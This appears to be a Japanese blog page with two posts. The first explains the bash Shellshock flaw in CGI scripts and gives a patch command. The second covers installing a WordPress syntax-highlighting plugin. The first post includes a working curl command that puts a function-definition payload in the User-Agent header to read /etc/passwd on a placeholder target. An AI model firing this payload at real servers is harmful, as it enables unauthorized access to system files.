bashの脆弱性

Webサーバでbashを使ってCGIを作成、もしくはWebサーバの起動ユーザのshellがbashの状態で、system関数を使うなどしていた場合、サニタイズしていてもすり抜けるバグがあるみたい。

例えばこんなCGI

#!/bin/bash

echo 'Content-type: text/plain'
echo
echo 'Hello world.'

こんなCGIでもダメらしい。ubuntuでは再現しませんでした(´艸`)

#!/usr/bin/perl

print "Content-type: text/plain\r\n\r\n";
system("echo 'Hello world'");

※perlのsystem関数に環境変数が引き継がれないので問題無いかも d(^-^)
※pythonの os.systemは、環境変数が引き継がれるので危ないみたいです。

そして、以下のようなおまじないを実行すると・・・

curl -F "NAME=VALUE" -F "NAME=VALUE" -A "() { :;}; echo Content-type:text/plain;echo;/bin/cat /etc/passwd" http://URL/hoge.cgi

※イタズラ厳禁ですからねっ!

修正方法

・CentOS

sudo yum update bash -y

ubuntu や solarisはまだパッケージでの更新はされていない様子です。

WordPressのプログラムコードを綺麗に表示してくれるプラグイン

■Crayon Syntax Highlighter
プラグインのインストールでインストールします。
検索するといっぱい出てくるのですが、ダウンロード数の多いのにしちゃいました♪

・プラグイン新規追加選択
Screenshot from 2014-09-13 12:09:44

・「Crayon Syntax Highlighter」を検索してインストール
Screenshot from 2014-09-13 12:24:52

・設定画面を開いて...
Screenshot from 2014-09-13 12:40:46

・Webサイト上でプログラムコードの表示された領域にマウスを持って行った時のツールバーの動作
Screenshot from 2014-09-13 11:04:54
こんな感じになりますよ♪
Screenshot from 2014-09-13 12:34:28